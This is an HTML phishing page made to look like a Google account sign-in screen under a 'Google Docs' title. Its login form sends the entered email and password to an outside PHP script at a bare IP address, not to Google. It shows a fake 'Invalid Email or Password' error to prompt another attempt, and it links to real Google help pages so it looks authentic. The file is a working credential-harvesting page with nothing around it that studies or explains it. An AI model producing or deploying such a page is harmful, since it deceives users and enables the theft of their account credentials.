<html>
    <head>
        <title>Google Docs - Untitled Document</title>
        <link rel = "stylesheet"
              type = "text/css"
              href = "main.css" />
    </head>
    <body>
        <center>
            <img src="1.png" id="logo">
            <div id="bigText">
                <p>One account. All of Google.</p>
            </div>
            <div id="login">
                    <img src="iconP.png" id="icon">
                    <form method="post" action="http://34.230.89.103/php-example.php">
                      <div>
                        <input name="say" id="say" placeholder="Email">
                      </div>
                      <div>
                        <input name="to" type="password" placeholder="Password">
                      </div>
                        <div class="text">
                        <p style="color:red; font-size:38px;">Error: Invalid Email or Password</p>
                        </div>
                      <div>
                        <button>Sign in</button>
                      </div>
                    </form>
                <div class="text" style="font-size: 40px; color: #015982; text-align: left; padding-left:20px;">
                    <a href="https://accounts.google.com/RecoverAccount"><p>Need Help?</p></a>
                </div>
            </div>
            <div class="text" style="font-size:40px;padding-top:20px;'">
                <a href="https://accounts.google.com/SignUp?continue=https%3A%2F%2Faccounts.google.com%2FManageAccount"><p>Create an Account</p></a>
            </div>
            <div class="links">
                <p class="text" style="margin-top: -40px; font-family:OpenSans; width:100%">One Google Account for everything Google</p>
                <img src="strip.png" style="width: 600px; padding-bottom:100px;">
            </div>
        </center>
    </body>
</html>